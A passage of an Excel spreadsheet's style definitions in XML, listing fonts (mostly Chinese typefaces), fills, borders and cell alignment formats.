      <name val="仿宋_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="楷体_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="22"/>
      <name val="方正小标宋简体"/>
      <family val="4"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="楷体_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="楷体"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="楷体"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="24"/>
      <name val="方正小标宋简体"/>
      <family val="4"/>
    </font>
    <font>
      <sz val="20"/>
      <name val="楷体_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="22"/>
      <color indexed="8"/>
      <name val="方正小标宋简体"/>
      <family val="4"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="楷体_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="Arial Narrow"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="楷体_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="22"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="楷体_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="仿宋_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="楷体"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="楷体_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="10"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="10"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="楷体"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color indexed="10"/>
      <name val="楷体"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color indexed="10"/>
      <name val="楷体_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="10"/>
      <name val="楷体"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="10"/>
      <name val="楷体"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="10"/>
      <name val="仿宋_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="10"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="10"/>
      <name val="楷体"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="10"/>
      <name val="楷体_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="16"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="方正隶书简体"/>
      <family val="4"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <name val="方正大标宋简体"/>
      <family val="4"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="黑体"/>
      <family val="0"/>
    </font>
    <font>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2"/>
      <color indexed="3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16"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <name val="黑体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="楷体_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF00000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2" fillId="2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="5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2" fillId="4" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="49" fillId="5" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="43" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="50" fillId="4" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="55" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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6" borderId="2" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="50" fillId="7" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="47" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="45" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="54" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="46" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="3" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="44" fillId="0" borderId="4" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="50" fillId="8" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="47" fillId="0" borderId="5" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="50" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="51" fillId="10" borderId="6" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="58" fillId="10" borderId="1" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="43" fillId="11" borderId="7" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="42" fillId="3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="50" fillId="12" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="59" fillId="0" borderId="8" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="53" fillId="0" borderId="9" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="60" fillId="2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="56" fillId="13" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="42" fillId="14" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="50"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5" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="7" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="50" fillId="18" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="50" fillId="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50" fillId="20" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="42" fillId="17"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42" fillId="22" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="50" fillId="23" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="306">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="52" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="52" applyFont="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="52" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
      <protection/>
    </xf>
    <xf numFmtId="22" fontId="6" fillId="0" borderId="0" xfId="52" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="52" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="right"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="12" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="13" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="13" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="5" fillId="0" borderId="13" xfId="52" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="7" fillId="0" borderId="13" xfId="52" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="52" applyNumberFormat="1" applyFont="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="13" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="13" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="13" xfId="52" applyFont="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="13" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="52" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="52" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="52" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="52" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="57" fontId="9" fillId="0" borderId="0" xfId="52" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="24" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="24" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="24"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24" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="22" fontId="13" fillId="0" borderId="0" xfId="52" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="24" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="24" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="176" fontId="15" fillId="24" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="176" fontId="15" fillId="24" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="176" fontId="15" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="176" fontId="13" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="177" fontId="13" fillId="24" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="178" fontId="10" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="176" fontId="13" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="24" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="24" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="22" fontId="13" fillId="24" borderId="0" xfId="52" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
      <protection/>
    </xf>
    <xf numFmtId="176" fontId="13" fillId="24" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="177" fontId="10" fillId="24" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="176" fontId="13" fillId="24" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="177" fontId="10" fillId="24" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="24" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="24" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="177" fontId="13" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="24" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="24" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="24" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="179" fontId="13" fillId="24" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="24" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="13" xfId="0" applyFont="1"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Fill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="5" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="14" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="10" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="15" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="52" applyFont="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="22" fontId="5" fillId="0" borderId="0" xfId="52" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
      <protection/>
    </xf>
    <xf numFmtId="22" fontId="6" fillId="0" borderId="0" xfId="52" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="52" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="16" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="17" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="18" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="19" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="10" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="20" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="13" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="180" fontId="5" fillId="0" borderId="13" xfId="52" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="12" xfId="52" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="1" fontId="5" fillId="0" borderId="13" xfId="52" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="1" fontId="5" fillId="0" borderId="21" xfId="52" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
      <protection/>
    </xf>
    <xf numFmtId="181" fontId="13" fillId="0" borderId="13" xfId="52" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
